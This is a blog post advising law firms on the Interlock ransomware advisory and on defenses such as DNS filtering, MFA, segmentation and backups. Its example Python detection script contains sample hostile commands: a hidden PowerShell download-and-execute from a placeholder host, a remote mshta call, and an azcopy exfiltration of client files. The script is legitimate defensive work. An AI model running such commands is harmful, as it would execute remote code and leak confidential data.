
Interlock Ransomware FBI Alert: How Your Law Firm Should Respond

Protect your firm from this spreading threat

Arthur Gaplanyan

FBI Warning

When was the last time you asked yourself: what happens if all of our case files, contracts, client records, and internal systems suddenly go dark, locked by invisible hands?

It may sound like a nightmare scenario for big corporations, but the truth is, ransomware is now squarely targeting smaller organizations with fewer defenses. That includes law firms.

In July 2025, CISA, the FBI, HHS, and MS‑ISAC issued a joint advisory (AA25‑203A) to warn about a fast‑escalating threat: Interlock ransomware.

Though it only first appeared publicly in September 2024, Interlock has already demonstrated advanced tactics, especially in how it infiltrates, exfiltrates, and holds data ransom.

Here’s what your firm needs to know and do.

What makes Interlock different and dangerous

1. Double extortion and delayed ransom demands

Interlock doesn’t simply encrypt your files. It first steals data, creating pressure with the threat of public exposure. That “double extortion” approach is already a mainstay among ransomware gangs.

But Interlock has a twist: victims often don’t see a ransom note or payment instructions until they reach out to the attackers. This gives attackers negotiating leverage and keeps defenders in the dark about how to respond immediately.

2. Cross‑platform targeting

Interlock operates on both Windows and Linux systems. It has also been observed encrypting virtual machines across both environments. That means hybrid or virtualized infrastructures aren’t safe by default.

3. Unusual initial access methods

Phishing and exposed RDP are common vectors for ransomware. However, Interlock has shown more creative techniques.

These include:

  • Drive-by downloads from compromised (but legitimate) websites, disguising payloads as browser or security tool updates

  • A social engineering tactic dubbed ClickFix, in which a victim is tricked into executing a malicious payload under the guise of “fixing” a problem, such as a fake CAPTCHA prompt or update

  • Once inside, data exfiltration with tools such as AzCopy or Azure Storage Explorer, and lateral movement supported by credential harvesting tools (Lumma Stealer, Berserk Stealer) and remote access toolkits (Cobalt Strike, AnyDesk)

Because of these sophisticated behaviors, a ransomware breach may be underway for days or weeks before anyone notices.

Why your firm is squarely in the crosshairs

Ransomware operators increasingly focus on opportunity rather than just large public companies. They know smaller organizations and professional firms often have thinner security budgets, yet they hold high-value client data.

If your firm’s systems go dark, you risk:

  • Losing access to client files and disrupting operations

  • Exposure of privileged, confidential data

  • Reputational fallout with clients, bar associations, or regulators

  • Recovery costs, legal liabilities, or noncompliance with data privacy obligations


In short, you can’t treat ransomware as “someone else’s problem.” It is now a firmwide risk.

How to defend today and stay ahead

The federal advisory (AA25‑203A) offers mitigation recommendations. Below, I translate them into actionable tactics for a law firm.


1. Harden your “front door” (initial access protection)

  • Use DNS filtering or protective DNS to block known malicious domains at resolution time, before a connection is ever made

  • Deploy web access firewalls and block access to high-risk sites

  • Train your staff on spotting social engineering like fake updates or unexpected prompts

2. Patch everything fast

Make sure all operating systems, firmware, and software (including backup systems) are up to date. Vulnerabilities are often the path ransomware exploits.

3. Segment and isolate your environment

Don’t let one compromised node become your entire network. Use segmentation or zero trust design so that lateral moves are harder to execute.

4. Enable multi‑factor authentication (MFA)

Every critical access point, such as remote desktops, admin consoles, and VPNs, should require a second factor beyond a password.

5. Deploy robust detection tools and monitor behavior

  • Use Endpoint Detection and Response (EDR) tools that can spot unusual activity, such as odd PowerShell commands or data exfiltration

  • Apply Sigma rules or detection logic for Interlock TTPs, which are included in the joint advisory

  • Monitor DNS query logs and alert on anomalous traffic that may signal command and control attempts

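To make the detection items concrete, here is a small added example (my own illustration, not code from the advisory) that runs simple rules over constructed process-creation events in Sysmon-style fields: a ClickFix-like pattern (a script host launched from explorer.exe with a URL on its command line), hidden or encoded PowerShell, and AzCopy pushing data to Azure Blob storage. Hostnames, paths and domains are placeholders.

```python
import re

# Constructed sample events (Sysmon Event ID 1 style fields), not real
# telemetry; hosts, paths and domains are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS-01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://update-check.invalid/fix | iex"'},
    {"host": "WS-02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha-verify.invalid/a"},
    {"host": "SRV-FILES", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Tools\azcopy.exe",
     "CommandLine": 'azcopy copy "D:\\Matters" "https://acct.blob.core.windows.net/c?sv=..." --recursive'},
    {"host": "WS-03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe C:\\Users\\jdoe\\brief.txt"},
]

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe")
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the names of every rule that fires on one event."""
    alerts = []
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    # ClickFix: the user pastes a command into Win+R, so explorer.exe becomes
    # the parent of a script host that reaches out to a URL.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and URL_RE.search(cmd):
        alerts.append("clickfix_like_remote_script")
    # Odd PowerShell: hidden window or encoded command line.
    if image in ("powershell.exe", "pwsh.exe") and re.search(
            r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s)", cmd):
        alerts.append("suspicious_powershell_flags")
    # Exfiltration: AzCopy copying data to Azure Blob storage.
    if image == "azcopy.exe" and "blob.core.windows.net" in cmd.lower():
        alerts.append("azcopy_to_azure_blob")
    return alerts

def scan(events):
    """Run every rule over a list of events; returns (host, rule) pairs."""
    return [(ev["host"], rule) for ev in events for rule in check_event(ev)]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

In practice the same rules map onto Sigma or your EDR's query language; the point is that each of the page's named TTPs leaves a distinct, matchable trace in process telemetry.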
6. Back up and validate your backups

Store backups offline or air-gapped. Test your restores regularly. Backups are your last line of defense if encryption succeeds.

7. Plan your incident response in advance

Don’t wait until encryption hits. Know your response chain, who to call, how to isolate, and how you’ll notify clients or regulators. Practice drills regularly.

Thinking ahead: resilience over reaction

This isn’t just about countering Interlock. The advisory is a warning that ransomware tactics are evolving faster than ever. Many of the recommendations above, including zero trust, behavioral detection, and segmentation, are foundational defenses that will protect you from the next strain as well.

If your firm waits until a crisis, the damage is more than financial. The trust of your clients, the integrity of your records, and your professional reputation all hang in the balance.


Let’s not wait. Let’s act decisively.

If you’d like help auditing your law firm’s readiness, building detection rules, or implementing a secure architecture, just say the word.